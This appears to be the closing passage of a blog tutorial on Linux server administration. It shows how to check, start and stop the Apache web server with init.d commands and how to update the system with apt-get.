<span style="background-color: transparent; color: #cc0000; font-family: 'Courier New'; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">$/etc/init.d/apache2 status</span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Apache is NOT running.</span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14pt; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">To start a service:</span><br />
<span style="background-color: transparent; color: #cc0000; font-family: 'Courier New'; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">$/etc/init.d/apache2 start</span><br />
<span style="background-color: transparent; color: #cc0000; font-family: 'Courier New'; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> * Starting web server apache2 [ OK ]</span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">To stop a service:</span><br />
<span style="background-color: transparent; color: #cc0000; font-family: 'Courier New'; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">$/etc/init.d/apache2 stop</span><br />
<span style="background-color: transparent; color: #cc0000; font-family: 'Courier New'; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">* Stopping web server apache2 </span><br />
<span style="background-color: transparent; color: #cc0000; font-family: 'Courier New'; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> ... waiting <span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span>[ OK ]</span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14pt; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Keeping the system updated</span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: white; color: #cc0000; font-family: 'Courier New'; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">sudo apt-get update<br class="kix-line-break" />sudo apt-get dist-upgrade</span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">I think this is it for the part 1. I might have missed some very important things in this part but I will try to cover them in later parts.</span></span></div></div></div>Unknownnoreply@blogger.com0